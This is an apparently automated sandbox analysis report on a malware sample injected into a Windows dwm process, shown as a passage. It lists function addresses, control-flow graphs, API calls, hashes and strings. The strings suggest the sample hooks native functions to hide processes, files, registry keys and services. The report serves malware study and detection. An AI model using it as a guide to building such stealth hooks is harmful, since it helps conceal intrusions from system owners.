                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA417AA
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA417CA
                                                                          • Sleep.KERNEL32 ref: 000001160CA41AD7
                                                                          • SleepEx.KERNELBASE ref: 000001160CA41ADD
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA417E5
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA41805
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA41820
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA41840
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA4185B
                                                                            • Part of subcall function 000001160CA41628: RegOpenKeyExW.ADVAPI32 ref: 000001160CA4187B
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA41896
                                                                            • Part of subcall function 000001160CA41628: RegCloseKey.ADVAPI32 ref: 000001160CA418A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: e3bafb9313e350035a90d8361a1b72c5955b0a5c1bc76b2f6aa057d2aabfd231
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: D531C971210B4182FF58AB26DA413ED63A5ABCCBC4F0455A1BF09877ADFE26C8D2C211

                                                                          Non-executed Functions

                                                                          Function 000001160CA42B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 575 1160ca42b2c-1160ca42ba5 call 1160ca62ce0 578 1160ca42bab-1160ca42bb1 575->578 579 1160ca42ee0-1160ca42f03 575->579 578->579 580 1160ca42bb7-1160ca42bba 578->580 580->579 581 1160ca42bc0-1160ca42bc3 580->581 581->579 582 1160ca42bc9-1160ca42bd9 GetModuleHandleA 581->582 583 1160ca42bdb-1160ca42beb call 1160ca56090 582->583 584 1160ca42bed 582->584 585 1160ca42bf0-1160ca42c0e 583->585 584->585 585->579 589 1160ca42c14-1160ca42c33 StrCmpNIW 585->589 589->579 590 1160ca42c39-1160ca42c3d 589->590 590->579 591 1160ca42c43-1160ca42c4d 590->591 591->579 592 1160ca42c53-1160ca42c5a 591->592 592->579 593 1160ca42c60-1160ca42c73 592->593 594 1160ca42c83 593->594 595 1160ca42c75-1160ca42c81 593->595 596 1160ca42c86-1160ca42c8a 594->596 595->596 597 1160ca42c9a 596->597 598 1160ca42c8c-1160ca42c98 596->598 599 1160ca42c9d-1160ca42ca7 597->599 598->599 600 1160ca42d9d-1160ca42da1 599->600 601 1160ca42cad-1160ca42cb0 599->601 604 1160ca42da7-1160ca42daa 600->604 605 1160ca42ed2-1160ca42eda 600->605 602 1160ca42cc2-1160ca42ccc 601->602 603 1160ca42cb2-1160ca42cbf call 1160ca4199c 601->603 607 1160ca42cce-1160ca42cdb 602->607 608 1160ca42d00-1160ca42d0a 602->608 603->602 609 1160ca42dbb-1160ca42dc5 604->609 610 1160ca42dac-1160ca42db8 call 1160ca4199c 604->610 605->579 605->593 607->608 614 1160ca42cdd-1160ca42cea 607->614 615 1160ca42d3a-1160ca42d3d 608->615 616 1160ca42d0c-1160ca42d19 608->616 611 1160ca42dc7-1160ca42dd4 609->611 612 1160ca42df5-1160ca42df8 609->612 610->609 611->612 618 1160ca42dd6-1160ca42de3 611->618 619 1160ca42dfa-1160ca42e03 call 1160ca41bbc 612->619 620 1160ca42e05-1160ca42e12 lstrlenW 612->620 621 1160ca42ced-1160ca42cf3 614->621 623 1160ca42d4b-1160ca42d58 lstrlenW 615->623 624 1160ca42d3f-1160ca42d49 call 1160ca41bbc 615->624 616->615 622 1160ca42d1b-1160ca42d28 616->622 627 1160ca42de6-1160ca42dec 618->627 619->620 637 1160ca42e4a-1160ca42e55 619->637 633 1160ca42e14-1160ca42e1e 620->633 634 1160ca42e35-1160ca42e3f call 1160ca43844 620->634 631 1160ca42cf9-1160ca42cfe 621->631 632 1160ca42d93-1160ca42d98 621->632 635 1160ca42d2b-1160ca42d31 622->635 628 1160ca42d5a-1160ca42d64 623->628 629 1160ca42d7b-1160ca42d8d call 1160ca43844 623->629 624->623 624->632 627->637 638 1160ca42dee-1160ca42df3 627->638 628->629 639 1160ca42d66-1160ca42d79 call 1160ca4152c 628->639 629->632 642 1160ca42e42-1160ca42e44 629->642 631->608 631->621 632->642 633->634 643 1160ca42e20-1160ca42e33 call 1160ca4152c 633->643 634->642 635->632 644 1160ca42d33-1160ca42d38 635->644 647 1160ca42ecc-1160ca42ed0 637->647 648 1160ca42e57-1160ca42e5b 637->648 638->612 638->627 639->629 639->632 642->605 642->637 643->634 643->637 644->615 644->635 647->605 652 1160ca42e5d-1160ca42e61 648->652 653 1160ca42e63-1160ca42e7d call 1160ca485c0 648->653 652->653 656 1160ca42e80-1160ca42e83 652->656 653->656 659 1160ca42ea6-1160ca42ea9 656->659 660 1160ca42e85-1160ca42ea3 call 1160ca485c0 656->660 659->647 662 1160ca42eab-1160ca42ec9 call 1160ca485c0 659->662 660->659 662->647
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: 7fddaefa59a8bf35f48f30940463c3a210b0ae04e3085f87a0a9d49c44080cb3
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: F5B15D72210B5086EBAD9F25D4407E967A5FB88B88F545296FF0993B99EF36CCC0C740
                                                                          Function 000001160CA47D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 81b2c937ceaef623f5c34ebcb20b3667d0ecb988eff06867b5113627a990c405
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: AB314072215B808AEB649F60E8907ED7374F788744F44456AEF4E97B98EF39C688C710
                                                                          Function 000001160CA4D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 47d4b0573420275bef55e6a4ec73ada5a95105225517eafdd6d8de0a8df5bcc0
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 76314932614B8086EB649F25E8403EE73A4F7897A8F504166FF9D43B99EF39C585CB00
                                                                          Function 000001160CA412BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: d2f923af1a3509ddc83667715395422f5fc2b433ff00cd748649d4cbc0394aba
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: ED512B76604B8486EB58CF62E5483EAB7A1F78DB99F448124EF4A07B58DF3DC085C700
                                                                          Function 000001160CA41D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 2d5a2e298f4ee84bcca8c96e84147e7409a3177502ebf4a921f87529f7dd87d3
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: A0319874900B4AA1FB0CEF69E9517D82321B78C348FC19593BF0A4257DAF7A86CAC350
                                                                          Function 000001160CA16910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 417 1160ca16910-1160ca16916 418 1160ca16918-1160ca1691b 417->418 419 1160ca16951-1160ca1695b 417->419 421 1160ca1691d-1160ca16920 418->421 422 1160ca16945-1160ca16984 call 1160ca16fc0 418->422 420 1160ca16a78-1160ca16a8d 419->420 426 1160ca16a9c-1160ca16ab6 call 1160ca16e54 420->426 427 1160ca16a8f 420->427 424 1160ca16938 __scrt_dllmain_crt_thread_attach 421->424 425 1160ca16922-1160ca16925 421->425 437 1160ca1698a-1160ca1699f call 1160ca16e54 422->437 438 1160ca16a52 422->438 433 1160ca1693d-1160ca16944 424->433 429 1160ca16927-1160ca16930 425->429 430 1160ca16931-1160ca16936 call 1160ca16f04 425->430 440 1160ca16ab8-1160ca16aed call 1160ca16f7c call 1160ca16e1c call 1160ca17318 call 1160ca17130 call 1160ca17154 call 1160ca16fac 426->440 441 1160ca16aef-1160ca16b20 call 1160ca17190 426->441 431 1160ca16a91-1160ca16a9b 427->431 430->433 450 1160ca16a6a-1160ca16a77 call 1160ca17190 437->450 451 1160ca169a5-1160ca169b6 call 1160ca16ec4 437->451 443 1160ca16a54-1160ca16a69 438->443 440->431 452 1160ca16b31-1160ca16b37 441->452 453 1160ca16b22-1160ca16b28 441->453 450->420 470 1160ca16a07-1160ca16a11 call 1160ca17130 451->470 471 1160ca169b8-1160ca169dc call 1160ca172dc call 1160ca16e0c call 1160ca16e38 call 1160ca1ac0c 451->471 455 1160ca16b39-1160ca16b43 452->455 456 1160ca16b7e-1160ca16b94 call 1160ca1268c 452->456 453->452 454 1160ca16b2a-1160ca16b2c 453->454 460 1160ca16c1f-1160ca16c2c 454->460 461 1160ca16b4f-1160ca16b5d call 1160ca25780 455->461 462 1160ca16b45-1160ca16b4d 455->462 478 1160ca16b96-1160ca16b98 456->478 479 1160ca16bcc-1160ca16bce 456->479 467 1160ca16b63-1160ca16b78 call 1160ca16910 461->467 482 1160ca16c15-1160ca16c1d 461->482 462->467 467->456 467->482 470->438 491 1160ca16a13-1160ca16a1f call 1160ca17180 470->491 471->470 520 1160ca169de-1160ca169e5 __scrt_dllmain_after_initialize_c 471->520 478->479 487 1160ca16b9a-1160ca16bbc call 1160ca1268c call 1160ca16a78 478->487 480 1160ca16bd0-1160ca16bd3 479->480 481 1160ca16bd5-1160ca16bea call 1160ca16910 479->481 480->481 480->482 481->482 501 1160ca16bec-1160ca16bf6 481->501 482->460 487->479 512 1160ca16bbe-1160ca16bc6 call 1160ca25780 487->512 509 1160ca16a21-1160ca16a2b call 1160ca17098 491->509 510 1160ca16a45-1160ca16a50 491->510 506 1160ca16bf8-1160ca16bff 501->506 507 1160ca16c01-1160ca16c11 call 1160ca25780 501->507 506->482 507->482 509->510 519 1160ca16a2d-1160ca16a3b 509->519 510->443 512->479 519->510 520->470 521 1160ca169e7-1160ca16a04 call 1160ca1abc8 520->521 521->470
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: fb12948a7d96eb56a7b3f21a00e61c1f8b29a39e1b06b669b2594c85a0de5db6
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 3481EC317403018AFB5CAB6E98513D922E1EB8DB80F1885A5BF48C379EDB3BC9C58700
                                                                          Function 000001160CA4CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 000001160CA4CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CEBC
                                                                          • SetLastError.KERNEL32 ref: 000001160CA4CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,000001160CA4ECCC,?,?,?,?,000001160CA4BF9F,?,?,?,?,?,000001160CA47AB0), ref: 000001160CA4CF2C
                                                                            • Part of subcall function 000001160CA4D6CC: HeapAlloc.KERNEL32 ref: 000001160CA4D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CF54
                                                                            • Part of subcall function 000001160CA4D744: HeapFree.KERNEL32 ref: 000001160CA4D75A
                                                                            • Part of subcall function 000001160CA4D744: GetLastError.KERNEL32 ref: 000001160CA4D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001160CA50A6B,?,?,?,000001160CA5045C,?,?,?,000001160CA4C84F), ref: 000001160CA4CF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: f827660739d0ac8d8d24de68a73a3964859ee74960ffd1903c01c389e7f99321
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 22418F3030278446FE6CA77599563E962925BCC7B8F6407A4BF3A466EFDF2F84C18200
                                                                          Function 000001160CA42244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: cdd4ff86511779fd0c9573889d0bb825dfaf229c40b7ad769213c07295287919
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: 6B213872614B4082FB18CB25E5443EA67A1F789BA5F908255FF9903BA8CF3DC189CB00
                                                                          Function 000001160CA19944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316783010.000001160CA10000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca10000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: 507866a2a6fc8ba6eab5877c5527049245992adbc793c09e3025b926bcece0c3
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: C1E19872604B808AEB689B79D4903DE77A0F789B98F040156FF8957B9ACB3AC5D1C700
                                                                          Function 000001160CA4A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: 382e1caebabbc5e426f8cd82ad255fea639d687bf281e2e0513fb49c9a6a1b0d
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 13E17972604B808AEB689F65D4803DE77A4F789B98F104156FF8957B9ACF3AC8D1D700
                                                                          Function 000001160CA4F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 6d2d6dc6cec25fe17a40349056cfc1752c4a0bb9243a60f64453e1439c99515e
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: BE41C332311B0095EA5ECBA6AC047D52391B78DBE0F499169BF0E8778CEF3AC4C59314
                                                                          Function 000001160CA4104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 03ce57cd114804130c9852ef01246f36428961059f3e316ea8917a3e9eb338af
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 7A412772214B84C6E7A4CF25E4447DEB7A1F388B99F448129EB8A07B5CDF39C589CB40
                                                                          Function 000001160CA4D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,000001160CA4C7DE,?,?,?,?,?,?,?,?,000001160CA4CF9D,?,?,00000001), ref: 000001160CA4D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA4C7DE,?,?,?,?,?,?,?,?,000001160CA4CF9D,?,?,00000001), ref: 000001160CA4D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA4C7DE,?,?,?,?,?,?,?,?,000001160CA4CF9D,?,?,00000001), ref: 000001160CA4D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA4C7DE,?,?,?,?,?,?,?,?,000001160CA4CF9D,?,?,00000001), ref: 000001160CA4D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,000001160CA4C7DE,?,?,?,?,?,?,?,?,000001160CA4CF9D,?,?,00000001), ref: 000001160CA4D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 3b2bff40e52c4bcaa2ff20759ca1e34918f246bdafde0a5395e5ee61b660fd40
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: 10115E30B0478485FA6CA76999513EE62415BCC7F4F6453A4BF7A476EEDE2AC4C28200
                                                                          Function 000001160CA47510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 3ab010fe06b6ba36ebed80a57169feb58a53b4299650cbacd3f9e1c250fd0669
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 9081A0716007818AFA5CAB29A4413E96791A7CDB80F5484A5FF09C779EEF3BC8C5C740
                                                                          Function 000001160CA49DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction ID: 6cf8cbd426831905dd0babb9811bc8e6eccaf663127cea74c340ac0b50481afb
                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                          • Instruction Fuzzy Hash: 5831C831312B40E1EE59DB52A401BE723A8B78CBA0F594565FF1E47799DF3AC4D58300
                                                                          Function 000001160CA53DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000029.00000002.3316848167.000001160CA40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA40000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_41_2_1160ca40000_dwm.jbxd
                                                                          Similarity
